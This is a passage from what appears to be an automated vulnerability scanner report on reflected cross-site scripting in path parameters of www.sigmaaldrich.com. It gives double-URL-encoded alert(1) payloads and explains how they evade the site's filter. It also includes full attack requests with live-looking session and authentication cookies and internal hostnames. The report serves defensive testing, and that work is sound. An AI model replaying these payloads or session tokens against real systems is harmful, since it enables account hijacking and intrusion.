Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:47 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich4f03e";alert(1)//8f2ccd45570/social/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.481. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6e6a%2522%253balert%25281%2529%252f%252fa9092da1e1a was submitted in the REST URL parameter 4. This input was echoed as e6e6a";alert(1)//a9092da1e1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/sociale6e6a%2522%253balert%25281%2529%252f%252fa9092da1e1a/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/sociale6e6a";alert(1)//a9092da1e1a/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.482. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10d6%2522%253balert%25281%2529%252f%252fb8b03b340a8 was submitted in the REST URL parameter 5. This input was echoed as c10d6";alert(1)//b8b03b340a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/linkedin-25x25c10d6%2522%253balert%25281%2529%252f%252fb8b03b340a8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:53 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/linkedin-25x25c10d6";alert(1)//b8b03b340a8","E404") ;
   </script>
...[SNIP]...

1.483. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9622%2522%253balert%25281%2529%252f%252fa28c336cd85 was submitted in the REST URL parameter 1. This input was echoed as a9622";alert(1)//a28c336cd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etca9622%2522%253balert%25281%2529%252f%252fa28c336cd85/medialib/sigma-aldrich/social/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etca9622";alert(1)//a28c336cd85/medialib/sigma-aldrich/social/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.484. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8556a%2522%253balert%25281%2529%252f%252f1fa9e72b184 was submitted in the REST URL parameter 2. This input was echoed as 8556a";alert(1)//1fa9e72b184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib8556a%2522%253balert%25281%2529%252f%252f1fa9e72b184/sigma-aldrich/social/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib8556a";alert(1)//1fa9e72b184/sigma-aldrich/social/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.485. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e978%2522%253balert%25281%2529%252f%252f4e81ba8cf40 was submitted in the REST URL parameter 3. This input was echoed as 8e978";alert(1)//4e81ba8cf40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich8e978%2522%253balert%25281%2529%252f%252f4e81ba8cf40/social/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
